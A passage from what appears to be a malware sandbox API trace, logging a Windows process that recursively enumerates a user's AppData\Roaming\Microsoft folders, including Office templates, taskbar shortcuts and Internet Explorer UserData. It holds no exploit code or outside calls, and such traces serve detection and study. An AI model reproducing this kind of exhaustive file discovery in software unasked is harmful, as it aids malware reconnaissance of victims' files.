returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*" [0083.193] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.193] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.193] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.193] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks", pszFile="1033" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033" [0083.193] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*" [0083.193] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.193] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.193] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.193] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033", pszFile="16" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16" [0083.193] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*" [0083.193] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.193] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.193] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.193] PathMatchSpecW (pszFile="Built-In Building Blocks.dotx", pszSpec="*") returned 1 [0083.193] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.193] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.193] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.193] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.193] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.193] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.194] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.194] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Excel" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel" [0083.194] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\*" [0083.194] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.194] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.194] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.194] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel", pszFile="XLSTART" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART" [0083.194] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*" [0083.194] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.194] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.194] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.194] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.194] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.194] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.194] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.194] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="IME12" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IME12") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IME12" [0083.194] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IME12", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IME12\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IME12\\*" [0083.194] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IME12\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.195] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.195] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.195] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.195] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.195] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="IMJP12" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP12") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP12" [0083.195] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP12", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP12\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP12\\*" [0083.195] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP12\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.195] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.195] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.195] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.195] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.195] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="IMJP8_1" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP8_1") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP8_1" [0083.195] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP8_1", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\*" [0083.195] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.196] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.196] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.196] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.196] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.196] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="IMJP9_0" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP9_0") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP9_0" [0083.196] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP9_0", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\*" [0083.196] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\IMJP9_0\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.196] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.196] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.196] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.197] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.197] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Internet Explorer" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0083.197] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*" [0083.197] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.197] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.197] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.197] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer", pszFile="Quick Launch" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0083.197] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" [0083.197] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.197] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.197] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.197] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0083.197] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.197] PathMatchSpecW (pszFile="Google Chrome.lnk", pszSpec="*") returned 1 [0083.197] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.197] PathMatchSpecW (pszFile="Launch Internet Explorer Browser.lnk", pszSpec="*") returned 1 [0083.197] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.197] PathMatchSpecW (pszFile="Microsoft Outlook.lnk", pszSpec="*") returned 1 [0083.197] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.197] PathMatchSpecW (pszFile="Shows Desktop.lnk", pszSpec="*") returned 1 [0083.197] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.197] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", pszFile="User Pinned" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" [0083.197] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*" [0083.197] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.197] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.197] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.197] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszFile="ImplicitAppShortcuts" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" [0083.197] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*" [0083.197] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.198] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.198] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.198] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.198] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.198] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszFile="TaskBar" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" [0083.198] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*" [0083.198] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.199] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.199] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.199] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0083.199] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.199] PathMatchSpecW (pszFile="Excel 2016.lnk", pszSpec="*") returned 1 [0083.199] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.199] PathMatchSpecW (pszFile="Google Chrome.lnk", pszSpec="*") returned 1 [0083.199] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.199] PathMatchSpecW (pszFile="Internet Explorer (2).lnk", pszSpec="*") returned 1 [0083.199] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.199] PathMatchSpecW (pszFile="Internet Explorer.lnk", pszSpec="*") returned 1 [0083.199] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.199] PathMatchSpecW (pszFile="Mozilla Firefox.lnk", pszSpec="*") returned 1 [0083.199] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.199] PathMatchSpecW (pszFile="OneNote 2016.lnk", pszSpec="*") returned 1 [0083.199] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.199] PathMatchSpecW (pszFile="Outlook 2016.lnk", pszSpec="*") returned 1 [0083.199] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.199] PathMatchSpecW (pszFile="PowerPoint 2016.lnk", pszSpec="*") returned 1 [0083.199] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.199] PathMatchSpecW (pszFile="Project 2016.lnk", pszSpec="*") returned 1 [0083.199] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.199] PathMatchSpecW (pszFile="Visio 2016.lnk", pszSpec="*") returned 1 [0083.199] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.199] PathMatchSpecW (pszFile="Windows Explorer (2).lnk", pszSpec="*") returned 1 [0083.199] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.199] PathMatchSpecW (pszFile="Windows Explorer.lnk", pszSpec="*") returned 1 [0083.199] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.199] PathMatchSpecW (pszFile="Windows Media Player (2).lnk", pszSpec="*") returned 1 [0083.199] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.199] PathMatchSpecW (pszFile="Windows Media Player.lnk", pszSpec="*") returned 1 [0083.199] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.199] PathMatchSpecW (pszFile="Word 2016.lnk", pszSpec="*") returned 1 [0083.199] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.199] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.200] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.200] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.200] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.200] PathMatchSpecW (pszFile="Window Switcher.lnk", pszSpec="*") returned 1 [0083.200] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.200] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.200] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.200] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer", pszFile="UserData" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData" [0083.200] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*" [0083.200] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.200] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.201] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.201] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", pszFile="Low" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low" [0083.201] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*" [0083.201] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.201] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.201] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.201] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", pszFile="356BZ594" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\356BZ594") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\356BZ594" [0083.201] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\356BZ594", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\356BZ594\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\356BZ594\\*" [0083.201] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\356BZ594\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.201] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.201] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.201] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.201] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.201] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.201] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 